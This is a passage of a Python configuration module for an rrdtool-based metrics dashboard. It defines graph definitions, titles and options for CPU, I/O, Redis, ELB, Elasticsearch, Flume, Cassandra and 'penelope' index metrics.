        'DEF:ldavg15=%(rrdpath)s/sar-load/load_avg_15m.rrd:sum:AVERAGE',
        'AREA:ldavg1#EAAF00FF:1 min load\\l',
        'AREA:ldavg5#FF7D00FF:5 min load\\l',
        'AREA:ldavg15#942D0CFF:15 min load \\l',
    ],
    # kB/s converted to MB/s by the /1024 CDEFs.
    'sar-paging-io': [
        'DEF:kbpgin_s=%(rrdpath)s/sar-paging/kb_pagein_sec.rrd:sum:AVERAGE',
        'CDEF:cdef_kbpgin_s=kbpgin_s,1024,/',
        'DEF:kbpgout_s=%(rrdpath)s/sar-paging/kb_pageout_sec.rrd:sum:AVERAGE',
        'CDEF:cdef_kbpgout_s=kbpgout_s,1024,/',
        'LINE1:cdef_kbpgin_s#EA8F00FF:MB paged in/s',
        'LINE1:cdef_kbpgout_s#EA8F00FF:MB paged out/s',
    ],
    'sar-paging-other': [
        'DEF:pg_freed_s=%(rrdpath)s/sar-paging/pages_freed_sec.rrd:sum:AVERAGE',
        'DEF:pg_scand_s=%(rrdpath)s/sar-paging/pages_scanned_directly_sec.rrd:sum:AVERAGE',
        'DEF:pg_scank_s=%(rrdpath)s/sar-paging/pages_scanned_kswapd_sec.rrd:sum:AVERAGE',
        'DEF:pg_stolen_s=%(rrdpath)s/sar-paging/pages_stolen_sec.rrd:sum:AVERAGE',
        'LINE1:pg_freed_s#ff4444ff:Pages freed',
        'LINE1:pg_scand_s#4444FFFF:Pages scanned directly',
        'LINE1:pg_scank_s#EA8F00FF:Pages scanned kswapd',
        'LINE1:pg_stolen_s#157419FF:Pages stolen',
    ],
    #'io': [
    #    'DEF:cpu_wio=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
    #    'LINE:cpu_wio#EA8F00:CPU iowait\\l',
    #],
    'redis-memory': [
        'DEF:memory=%(rrdpath)s/redis/used_memory.rrd:sum:AVERAGE',
        'LINE:memory#EA8F00:Redis memory\\l',
    ],
    'redis-connections': [
        'DEF:connected_clients=%(rrdpath)s/redis/connected_clients.rrd:sum:AVERAGE',
        'DEF:connected_slaves=%(rrdpath)s/redis/connected_slaves.rrd:sum:AVERAGE',
        'DEF:blocked_clients=%(rrdpath)s/redis/blocked_clients.rrd:sum:AVERAGE',
        'LINE:connected_clients#35962B:Connected clients\\l',
        'LINE:connected_slaves#0000FF:Connected slaves\\l',
        'LINE:blocked_clients#FF0000:Blocked clients\\l',
    ],
    'elb-requests': [
        'DEF:request_count=%(rrdpath)s/elb/request_count.rrd:sum:AVERAGE',
        'LINE:request_count#00FF00:Requests per minute\\l',
    ],
    'elb-latency': [
        #'DEF:min=%(rrdpath)s/elb/latency_min.rrd:sum:AVERAGE',
        #'DEF:max=%(rrdpath)s/elb/latency_max.rrd:sum:AVERAGE',
        'DEF:avg=%(rrdpath)s/elb/latency_avg.rrd:sum:AVERAGE',
        #'LINE:min#FF0000:Upstream latency (min)\\l',
        #'LINE:max#0000FF:Upstream latency (max)\\l',
        'LINE:avg#3333FF:Upstream latency (avg)\\l',
    ],
    # metartg's own throughput: metrics processed vs. still queued.
    'metartg-processed': [
        'DEF:processed=%(rrdpath)s/metartg/processed.rrd:sum:AVERAGE',
        'DEF:queued=%(rrdpath)s/metartg/queued.rrd:sum:AVERAGE',
        'LINE:processed#00FF00:Processed metrics\\l',
        'LINE:queued#FF0000:Queued metrics\\l',
    ],
    'elasticsearch-memory': [
        'DEF:heap_committed=%(rrdpath)s/elasticsearch-memory/jvm.heap.committed.rrd:sum:AVERAGE',
        'DEF:heap_used=%(rrdpath)s/elasticsearch-memory/jvm.heap.used.rrd:sum:AVERAGE',
        'DEF:nonheap_committed=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
        'DEF:nonheap_used=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.used.rrd:sum:AVERAGE',
        'AREA:heap_used#006699:heap used\\l',
        'LINE:heap_committed#FFFFFF:heap committed\\l',
        'AREA:nonheap_used#009966:nonheap used\\l',
        'LINE:nonheap_committed#F8FF47:nonheap committed\\l',
    ],
    'elasticsearch-shards': [
        'DEF:active_shards=%(rrdpath)s/elasticsearch-shards/active_shards.rrd:sum:AVERAGE',
        'DEF:active_primary_shards=%(rrdpath)s/elasticsearch-shards/active_primary_shards.rrd:sum:AVERAGE',
        'DEF:unassigned_shards=%(rrdpath)s/elasticsearch-shards/unassigned_shards.rrd:sum:AVERAGE',
        'DEF:initializing_shards=%(rrdpath)s/elasticsearch-shards/initializing_shards.rrd:sum:AVERAGE',
        'LINE:active_shards#006699FF:active shards\\l',
        'LINE:active_primary_shards#837C04FF:active primary shards\\l',
        'LINE:unassigned_shards#F51D30FF:unassigned shards\\l',
        'LINE:initializing_shards#157419FF:initializing shards\\l',
    ],
    'elasticsearch-gc': [
        'DEF:gc_time=%(rrdpath)s/elasticsearch-gc/gc.collection.time.rrd:sum:AVERAGE',
        'AREA:gc_time#4668E4FF:gc time (ms)\\l',
    ],
    # Per-index segment stats; 'places' and 'redirects' are index names.
    'elasticsearch-segments-count': [
        'DEF:places_segment_count=%(rrdpath)s/elasticsearch-segments/places.segment.count.rrd:sum:AVERAGE',
        'AREA:places_segment_count#009966:places count\\l',
        'DEF:redirects_segment_count=%(rrdpath)s/elasticsearch-segments/redirects.segment.count.rrd:sum:AVERAGE',
        'AREA:redirects_segment_count#006699:redirects count\\l',
    ],
    'elasticsearch-segments-docs': [
        'DEF:places_segment_docs=%(rrdpath)s/elasticsearch-segments/places.segment.docs.rrd:sum:AVERAGE',
        'AREA:places_segment_docs#009966:places amount\\l',
        'DEF:redirects_segment_docs=%(rrdpath)s/elasticsearch-segments/redirects.segment.docs.rrd:sum:AVERAGE',
        'AREA:redirects_segment_docs#006699:redirects amount\\l',
    ],
    'elasticsearch-segments-size': [
        'DEF:places_segment_size=%(rrdpath)s/elasticsearch-segments/places.segment.size.rrd:sum:AVERAGE',
        'AREA:places_segment_size#009966:places total segment size in MBs\\l',
        'DEF:redirects_segment_size=%(rrdpath)s/elasticsearch-segments/redirects.segment.size.rrd:sum:AVERAGE',
        'AREA:redirects_segment_size#006699:redirects total segment size in MBs\\l',
    ],
    # Stacks nonheap on top of heap; the CDEF pre-adds the committed values
    # so the 'nonheap committed' line lands at the top of the stack.
    'flume-memory': [
        'DEF:heap_committed=%(rrdpath)s/flume/jvm.mem.heap.committed.rrd:sum:AVERAGE',
        'DEF:heap_used=%(rrdpath)s/flume/jvm.mem.heap.used.rrd:sum:AVERAGE',
        'DEF:other_committed=%(rrdpath)s/flume/jvm.mem.other.committed.rrd:sum:AVERAGE',
        'DEF:other_used=%(rrdpath)s/flume/jvm.mem.other.used.rrd:sum:AVERAGE',
        'CDEF:other_committed_stack=heap_committed,other_committed,+',
        'AREA:heap_used#006699:heap used\\l',
        'LINE:heap_committed#FFFFFF:heap committed\\l',
        'AREA:other_used#009966:nonheap used\\l:STACK',
        'LINE:other_committed_stack#FFFFFF:nonheap committed\\l',
    ],
    'flume-tailer': [
        'DEF:events=%(rrdpath)s/flume/sg_api_tailer_api.events.rrd:sum:AVERAGE',
        'LINE:events#00FF00:tail events\\l',
    ],
    'flume-writer': [
        'DEF:events=%(rrdpath)s/flume/sg_api_writer_api.events.rrd:sum:AVERAGE',
        'DEF:appendSuccess=%(rrdpath)s/flume/sg_api_writer_api.appendSuccess.rrd:sum:AVERAGE',
        'DEF:appendFails=%(rrdpath)s/flume/sg_api_writer_api.appendFails.rrd:sum:AVERAGE',
        'DEF:appendRecovers=%(rrdpath)s/flume/sg_api_writer_api.appendRecovers.rrd:sum:AVERAGE',
        'LINE:events#00FF00:writer events\\l',
        'LINE:appendSuccess#FFFFFF:successful appends\\l',
        'LINE:appendFails#FF0000:failed appends\\l',
        'LINE:appendRecovers#FFFF00:recovered appends\\l',
    ],
}
RRD_LGRAPH_DEFS = {
'system-cpu': [
'DEF:cpu_user=%(rrdpath)s/cpu/user.rrd:sum:AVERAGE',
'VDEF:cpu_user_max=cpu_user,MAXIMUM',
'VDEF:cpu_user_95th=cpu_user,95,PERCENT',
'DEF:cpu_system=%(rrdpath)s/cpu/sys.rrd:sum:AVERAGE',
'VDEF:cpu_system_max=cpu_system,MAXIMUM',
'VDEF:cpu_system_95th=cpu_system,95,PERCENT',
'DEF:cpu_nice=%(rrdpath)s/cpu/nice.rrd:sum:AVERAGE',
'VDEF:cpu_nice_max=cpu_nice,MAXIMUM',
'VDEF:cpu_nice_95th=cpu_nice,95,PERCENT',
'DEF:cpu_iowait=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
'VDEF:cpu_iowait_max=cpu_iowait,MAXIMUM',
'VDEF:cpu_iowait_95th=cpu_iowait,95,PERCENT',
'DEF:cpu_steal=%(rrdpath)s/cpu/steal.rrd:sum:AVERAGE',
'VDEF:cpu_steal_max=cpu_steal,MAXIMUM',
'VDEF:cpu_steal_95th=cpu_steal,95,PERCENT',
'AREA:cpu_system#FF6600:CPU system:STACK',
'GPRINT:cpu_system:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_system:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_system_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_system_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_nice#FFCC00:CPU nice :STACK',
'GPRINT:cpu_nice:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_nice:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_nice_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_nice_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_user#FFFF66:CPU user :STACK',
'GPRINT:cpu_user:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_user:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_user_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_user_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_iowait#FF5555:CPU iowait:STACK',
'GPRINT:cpu_iowait:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_steal#EA8F00:CPU steal :STACK',
'GPRINT:cpu_steal:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_steal:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_steal_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_steal_95th:95th\\: %%8.2lf %%%%\\c',
],
'sar-io': [
'DEF:iowait=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'DEF:iowait_x=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'VDEF:iowait_max=iowait,MAXIMUM',
'VDEF:iowait_95th=iowait,95,PERCENT',
'DEF:bread_s=%(rrdpath)s/sar-io/bytes_read_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bread_s=bread_s,512,*,1048576,/',
'VDEF:cdef_bread_s_max=cdef_bread_s,MAXIMUM',
'VDEF:cdef_bread_s_95th=cdef_bread_s,95,PERCENT',
'DEF:bwrit_s=%(rrdpath)s/sar-io/bytes_written_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bwrit_s=bwrit_s,512,*,1048576,/',
'VDEF:cdef_bwrit_s_max=cdef_bwrit_s,MAXIMUM',
'VDEF:cdef_bwrit_s_95th=cdef_bwrit_s,95,PERCENT',
'DEF:pswpin_s=%(rrdpath)s/sar-swapping/pages_swapped_in_sec.rrd:sum:AVERAGE',
'VDEF:pswpin_s_max=pswpin_s,MAXIMUM',
'VDEF:pswpin_s_95th=pswpin_s,95,PERCENT',
'DEF:pswpout_s=%(rrdpath)s/sar-swapping/pages_swapped_out_sec.rrd:sum:AVERAGE',
'VDEF:pswpout_s_max=pswpout_s,MAXIMUM',
'VDEF:pswpout_s_95th=pswpout_s,95,PERCENT',
'AREA:iowait#D8ACE0FF:CPU i/o wait',
'GPRINT:iowait:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:iowait:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:iowait_max:Max\\: %%8.2lf %%%%',
'GPRINT:iowait_95th:95th\\: %%8.2lf %%%%\\c',
'LINE1:iowait_x#623465FF:',
'LINE1:cdef_bread_s#EA8F00FF:MB read/s ',
'GPRINT:cdef_bread_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s_max:Max\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:cdef_bwrit_s#157419FF:MB written/s',
'GPRINT:cdef_bwrit_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s_max:Max\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:pswpin_s#4444FFFF:Swap in/s ',
'GPRINT:pswpin_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:pswpin_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:pswpin_s_max:Max\\: %%8.2lf %%s',
'GPRINT:pswpin_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:pswpout_s#7EE600FF:Swap out/s ',
'GPRINT:pswpout_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:pswpout_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:pswpout_s_max:Max\\: %%8.2lf %%s',
'GPRINT:pswpout_s_95th:95th\\: %%8.2lf %%s\\c',
],
'elasticsearch-memory': [
'DEF:heap_committed=%(rrdpath)s/elasticsearch-memory/jvm.heap.committed.rrd:sum:AVERAGE',
'VDEF:heap_committed_max=heap_committed,MAXIMUM',
'VDEF:heap_committed_95th=heap_committed,95,PERCENT',
'DEF:heap_used=%(rrdpath)s/elasticsearch-memory/jvm.heap.used.rrd:sum:AVERAGE',
'VDEF:heap_used_max=heap_used,MAXIMUM',
'VDEF:heap_used_95th=heap_used,95,PERCENT',
'DEF:nonheap_committed=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
'VDEF:nonheap_committed_max=nonheap_committed,MAXIMUM',
'VDEF:nonheap_committed_95th=nonheap_committed,95,PERCENT',
'DEF:nonheap_used=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.used.rrd:sum:AVERAGE',
'VDEF:nonheap_used_max=nonheap_used,MAXIMUM',
'VDEF:nonheap_used_95th=nonheap_used,95,PERCENT',
'AREA:heap_used#006699:heap used ',
'GPRINT:heap_used:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:heap_used:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:heap_used_max:Max\\: %%8.2lf %%sB',
'GPRINT:heap_used_95th:95th\\: %%8.2lf %%sB\\c',
'AREA:nonheap_used#009966:nonheap used ',
'GPRINT:nonheap_used:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:nonheap_used:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:nonheap_used_max:Max\\: %%8.2lf %%sB',
'GPRINT:nonheap_used_95th:95th\\: %%8.2lf %%sB\\c',
'LINE:heap_committed#FFFFFF:heap committed ',
'GPRINT:heap_committed:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:heap_committed:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:heap_committed_max:Max\\: %%8.2lf %%sB',
'GPRINT:heap_committed_95th:95th\\: %%8.2lf %%sB\\c',
'LINE:nonheap_committed#F8FF47:nonheap committed',
'GPRINT:nonheap_committed:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed_max:Max\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed_95th:95th\\: %%8.2lf %%sB\\c',
],
'elasticsearch-gc': [
'DEF:gc_time=%(rrdpath)s/elasticsearch-gc/gc.collection.time.rrd:sum:AVERAGE',
'VDEF:gc_time_max=gc_time,MAXIMUM',
'VDEF:gc_time_95th=gc_time,95,PERCENT',
'AREA:gc_time#4668E4FF:gc time (ms)',
'GPRINT:gc_time:LAST:Cur\\: %%8.2lf ms',
'GPRINT:gc_time:AVERAGE:Avg\\: %%8.2lf ms',
'GPRINT:gc_time_max:Max\\: %%8.2lf ms',
'GPRINT:gc_time_95th:95th\\: %%8.2lf ms\\c',
],
}
# Extra rrdtool command-line flags per graph type (axis limits, scaling
# base, slope mode).  Graph types not listed here get no extra flags.
RRD_GRAPH_OPTIONS = {
    'system-cpu': ['--upper-limit', '100.0'],
    'sar-io': ['--base', '1000', '--slope-mode', '--upper-limit', '80', '--alt-autoscale-max'],
    'sar-load': ['--base', '1000', '--slope-mode', '--upper-limit', '100', '--alt-autoscale-max'],
    'sar-paging-other': ['--base', '1000'],
    #'io': ['--upper-limit', '100.0']
}
# Graph title templates per graph type; %(host)s is substituted at render
# time and %% is an escaped literal percent sign.
RRD_GRAPH_TITLE = {
    'network-bytes': '%(host)s | bytes in/out',
    'network-packets': '%(host)s | packets in/out',
    'system-cpu': '%(host)s | cpu %%',
    'system-memory': '%(host)s | memory utilization',
    'sar-io': '%(host)s | sar i/o',
    'sar-load': '%(host)s | sar load average',
    'sar-paging-io': '%(host)s | sar paging in/out',
    'sar-paging-other': '%(host)s | sar paging other',
    #'io': '%(host)s | disk i/o',
    'redis-memory': '%(host)s | redis memory',
    'redis-connections': '%(host)s | redis connections',
    'cassandra-scores': '%(host)s | cassandra scores',
    'elb-requests': '%(host)s | ELB requests/min',
    'elb-latency': '%(host)s | ELB latency (seconds)',
    'metartg-processed': '%(host)s | metrics processed per minute',
    'elasticsearch-memory': '%(host)s | Elasticsearch Memory',
    'elasticsearch-shards': '%(host)s | Elasticsearch Shards',
    'elasticsearch-gc': '%(host)s | Elasticsearch Garbage Collection',
    'elasticsearch-segments-size': '%(host)s | Elasticsearch Segment Sizes',
    'elasticsearch-segments-count': '%(host)s | Elasticsearch Segment Amounts',
    'elasticsearch-segments-docs': '%(host)s | Elasticsearch Segment Document Amounts',
    'flume-memory': '%(host)s | Flume JVM memory',
    'flume-tailer': '%(host)s | Flume tail source',
    'flume-writer': '%(host)s | Flume HDFS writer',
}
# (graph key, human-readable label) pairs, in display order.  The loops
# further down append additional dynamically-discovered entries.
RRD_GRAPH_TYPES = [
    ('system-cpu', 'CPU'),
    ('system-memory', 'Memory'),
    ('sar-io', 'I/O'),
    ('sar-load', 'Load Average'),
    ('sar-paging-io', 'Paging I/O'),
    ('sar-paging-other', 'Paging Other'),
    ('redis-memory', 'Memory'),
    ('redis-connections', 'Connections'),
    ('cassandra-scores', 'Scores'),
    ('elb-requests', 'ELB Requests'),
    ('elb-latency', 'ELB Latency'),
    ('metartg-processed', 'Processed'),
    ('network-bytes', 'Bytes tx/rx'),
    ('network-packets', 'Packets tx/rx'),
    ('elasticsearch-memory', 'Elasticsearch Memory'),
    ('elasticsearch-shards', 'Elasticsearch Shards'),
    ('elasticsearch-gc', 'Elasticsearch Garbage Collection'),
    ('elasticsearch-segments-size', 'Elasticsearch Segment Sizes'),
    ('elasticsearch-segments-count', 'Elasticsearch Segment Amounts'),
    ('elasticsearch-segments-docs', 'Elasticsearch Segment Document Amounts'),
    ('flume-memory', 'Flume JVM memory'),
    ('flume-tailer', 'Flume tail source'),
    ('flume-writer', 'Flume HDFS writer'),
    # ('io', 'Disk I/O'),
    # ('redis-memory', 'Redis memory'),
]
# Cassandra thread-pool stage names used to build per-stage graph keys and
# RRD filenames below (presumably matching `nodetool tpstats` output —
# TODO confirm against the collector that writes these RRDs).
tpstats_list = [
    'AE-SERVICE-STAGE',
    'CONSISTENCY-MANAGER',
    'FLUSH-SORTER-POOL',
    'FLUSH-WRITER-POOL',
    'GMFD',
    'HINTED-HANDOFF-POOL',
    'LB-OPERATIONS',
    'LB-TARGET',
    'LOAD-BALANCER-STAGE',
    'MEMTABLE-POST-FLUSHER',
    'MESSAGE-STREAMING-POOL',
    'METADATA-MUTATION-STAGE',
    'MISCELLANEOUS-POOL',
    'PENELOPE-STAGE',
    'RESPONSE-STAGE',
    'ROW-MUTATION-STAGE',
    'ROW-READ-STAGE',
    'STREAM-STAGE',
    'THRIFT',
]
# Register two graphs per Cassandra thread-pool stage: a pending/active
# graph and a separate completed-tasks graph.  %% survives the %-format
# here so %(rrdpath)s can be substituted later at render time.
for tpstats in tpstats_list:
    base_key = 'cassandra-tpstats-%s' % tpstats
    completed_key = '%s-completed' % base_key
    RRD_GRAPH_DEFS[base_key] = [
        'DEF:pending=%%(rrdpath)s/cassandra_tpstats/%s_PendingTasks.rrd:sum:AVERAGE' % tpstats,
        'DEF:active=%%(rrdpath)s/cassandra_tpstats/%s_ActiveCount.rrd:sum:AVERAGE' % tpstats,
        'LINE:pending#FF6600:%s pending\\l' % tpstats,
        'LINE:active#66FF00:%s active\\l' % tpstats,
    ]
    RRD_GRAPH_DEFS[completed_key] = [
        'DEF:completed=%%(rrdpath)s/cassandra_tpstats/%s_CompletedTasks.rrd:sum:AVERAGE' % tpstats,
        'LINE:completed#0066FF:%s completed\\l' % tpstats,
    ]
    RRD_GRAPH_TITLE[base_key] = '%%(host)s | cassandra %s' % tpstats
    RRD_GRAPH_TITLE[completed_key] = '%%(host)s | cassandra %s completed' % tpstats
    RRD_GRAPH_TYPES.append((base_key, tpstats))
    RRD_GRAPH_TYPES.append((completed_key, '%s completed' % tpstats))
# Discover (keyspace, columnfamily) pairs from the sstable RRD files that
# already exist on disk.  A dict is used as a de-duplicating set; the
# final assignment keeps only the unique key tuples.
sstables_list = {}
path = RRDPATH % {
    'host': '*',
    'service': 'cassandra_sstables',
    'metric': '*',
}
for filename in glob(path):
    # Filenames look like <keyspace>.<columnfamily>.<stat>.rrd; take the
    # first two dot-separated components as the identifying pair.
    basename = os.path.basename(filename)
    pair = tuple(basename.split('.', 3)[:2])
    sstables_list[pair] = None
sstables_list = sstables_list.keys()
# ks = keyspace
# cf = columnfamily
# Register three graphs per discovered (keyspace, columnfamily) pair:
# min/max/avg sstable size, total sstable size, and sstable count.
for ks, cf in sstables_list:
    RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-minmaxavg' % (ks, cf)] = [
        'DEF:min=%%(rrdpath)s/cassandra_sstables/%s.%s.min.rrd:sum:AVERAGE' % (ks, cf),
        'DEF:max=%%(rrdpath)s/cassandra_sstables/%s.%s.max.rrd:sum:AVERAGE' % (ks, cf),
        'DEF:avg=%%(rrdpath)s/cassandra_sstables/%s.%s.avg.rrd:sum:AVERAGE' % (ks, cf),
        'LINE:min#66FFFF:sstable size (min)\\l',
        'LINE:max#FF6600:sstable size (max)\\l',
        'LINE:avg#66FF00:sstable size (avg)\\l',
    ]
    RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-total' % (ks, cf)] = [
        'DEF:total=%%(rrdpath)s/cassandra_sstables/%s.%s.total.rrd:sum:AVERAGE' % (ks, cf),
        'LINE:total#EA8F00:sstable size (total)\\l',
    ]
    RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-count' % (ks, cf)] = [
        'DEF:count=%%(rrdpath)s/cassandra_sstables/%s.%s.count.rrd:sum:AVERAGE' % (ks, cf),
        'LINE:count#00FF00:sstable count\\l',
    ]
    RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-minmaxavg' % (ks, cf)] = '%%(host)s | %s %s size (min/max/avg)' % (ks, cf)
    RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-total' % (ks, cf)] = '%%(host)s | %s %s size (total)' % (ks, cf)
    RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-count' % (ks, cf)] = '%%(host)s | %s %s count' % (ks, cf)
    RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-minmaxavg' % (ks, cf), '%s %s min/max/avg' % (ks, cf)))
    RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-total' % (ks, cf), '%s %s total' % (ks, cf)))
    RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-count' % (ks, cf), '%s %s count' % (ks, cf)))
# Commit log graphs
RRD_GRAPH_DEFS['cassandra-commitlog-pending'] = [
    'DEF:pending=%(rrdpath)s/cassandra_commitlog/tasks.pending.rrd:sum:AVERAGE',
    'LINE:pending#FF0000:tasks pending\\l',
]
RRD_GRAPH_TITLE['cassandra-commitlog-pending'] = '%(host)s | Commitlog - Pending'
RRD_GRAPH_TYPES.append(('cassandra-commitlog-pending', 'Commitlog Pending'))
RRD_GRAPH_DEFS['cassandra-commitlog-completed'] = [
    'DEF:completed=%(rrdpath)s/cassandra_commitlog/tasks.completed.rrd:sum:AVERAGE',
    'LINE:completed#55FF55:tasks completed\\l',
]
RRD_GRAPH_TITLE['cassandra-commitlog-completed'] = '%(host)s | Commitlog - Completed'
RRD_GRAPH_TYPES.append(('cassandra-commitlog-completed', 'Commitlog Completed'))
# Streaming graphs
RRD_GRAPH_DEFS['cassandra-streaming'] = [
    'DEF:from=%(rrdpath)s/cassandra_streaming/streaming.from.rrd:sum:AVERAGE',
    'DEF:to=%(rrdpath)s/cassandra_streaming/streaming.to.rrd:sum:AVERAGE',
    'LINE:from#55FF55:from\\l',
    'LINE:to#FF5555:to\\l',
]
RRD_GRAPH_TITLE['cassandra-streaming'] = '%(host)s | Streaming Activity'
RRD_GRAPH_TYPES.append(('cassandra-streaming', 'Streaming Activity'))
# Compaction graphs
RRD_GRAPH_DEFS['cassandra-compaction'] = [
    'DEF:compacting=%(rrdpath)s/cassandra_compaction/bytes.compacting.rrd:sum:AVERAGE',
    'DEF:remaining=%(rrdpath)s/cassandra_compaction/bytes.remaining.rrd:sum:AVERAGE',
    'LINE:compacting#55FF55:compacting\\l',
    'LINE:remaining#FF5555:remaining\\l',
]
RRD_GRAPH_TITLE['cassandra-compaction'] = '%(host)s | Compaction Activity'
RRD_GRAPH_TYPES.append(('cassandra-compaction', 'Compaction Activity'))
RRD_GRAPH_DEFS['cassandra-compaction-tasks'] = [
    'DEF:pending=%(rrdpath)s/cassandra_compaction/tasks.pending.rrd:sum:AVERAGE',
    'LINE:pending#55FF55:pending\\l',
]
RRD_GRAPH_TITLE['cassandra-compaction-tasks'] = '%(host)s | Compaction Tasks'
RRD_GRAPH_TYPES.append(('cassandra-compaction-tasks', 'Compaction Tasks'))
# Heap graphs: the CDEF pre-adds heap+nonheap committed so the stacked
# 'nonheap committed' outline sits at the top of the stacked areas.
RRD_GRAPH_DEFS['cassandra-memory'] = [
    'DEF:heap_committed=%(rrdpath)s/cassandra_memory/jvm.heap.committed.rrd:sum:AVERAGE',
    'DEF:heap_used=%(rrdpath)s/cassandra_memory/jvm.heap.used.rrd:sum:AVERAGE',
    'DEF:nonheap_committed=%(rrdpath)s/cassandra_memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
    'DEF:nonheap_used=%(rrdpath)s/cassandra_memory/jvm.nonheap.used.rrd:sum:AVERAGE',
    'CDEF:nonheap_committed_stack=heap_committed,nonheap_committed,+',
    'AREA:heap_used#006699:heap used\\l',
    'LINE:heap_committed#FFFFFF:heap committed\\l',
    'AREA:nonheap_used#009966:nonheap used\\l:STACK',
    'LINE:nonheap_committed_stack#FFFFFF:nonheap committed\\l',
]
RRD_GRAPH_TITLE['cassandra-memory'] = '%(host)s | Cassandra Memory'
RRD_GRAPH_TYPES.append(('cassandra-memory', 'Cassandra Memory'))
# penelope graphs
# One success/fail graph per batch operation; the RRD metric names embed a
# literal backslash-colon ('\:'), matching the files the collector writes.
for op in ['index', 'unindex']:
    RRD_GRAPH_DEFS['penelope-batch-%s' % op] = [
        'DEF:attempt=%%(rrdpath)s/penelope/batch_%s_attempt\:count.rrd:sum:AVERAGE' % op,
        'DEF:success=%%(rrdpath)s/penelope/batch_%s_success\:count.rrd:sum:AVERAGE' % op,
        # Failures are derived: attempts that did not succeed.
        'CDEF:fail=attempt,success,-',
        'AREA:success#66FF66:success\\l',
        'AREA:fail#FF6666:fail\\l:STACK',
    ]
    RRD_GRAPH_TITLE['penelope-batch-%s' % op] = '%%(host)s | batch_%s requests' % op
    RRD_GRAPH_TYPES.append(('penelope-batch-%s' % op, 'Penelope batch_%s requests' % op))
# Per-index-type penelope graphs (cache behavior, operation rates,
# metadata reads/invalidations, split decisions).  As above, '%%' defers
# %(rrdpath)s / %(host)s substitution to render time and '\:' is a literal
# backslash-colon in the RRD filenames.
for index_type in ['bplus', 'kdmulti']:
    # hitrate for caches
    RRD_GRAPH_DEFS['penelope-%s-cache-hitrate' % index_type] = [
        'DEF:hitrate=%%(rrdpath)s/penelope/%s_nodecache_recent_hit_rate\:mean.rrd:sum:AVERAGE' % index_type,
        'LINE:hitrate#66FF00:hitrate\\l',
    ]
    RRD_GRAPH_TITLE['penelope-%s-cache-hitrate' % index_type] = '%%(host)s | %s cache hit rate' % index_type
    RRD_GRAPH_TYPES.append(('penelope-%s-cache-hitrate' % index_type, 'Penelope %s cache hit rate' % index_type))
    RRD_GRAPH_OPTIONS['penelope-%s-cache-hitrate' % index_type] = ['--upper-limit', '100.0', '--lower-limit', '0.0']
    # size of node caches
    RRD_GRAPH_DEFS['penelope-%s-cache-size' % index_type] = [
        'DEF:items=%%(rrdpath)s/penelope/%s_nodecache_size\:mean.rrd:sum:AVERAGE' % index_type,
        'AREA:items#9999FF:items\\l',
    ]
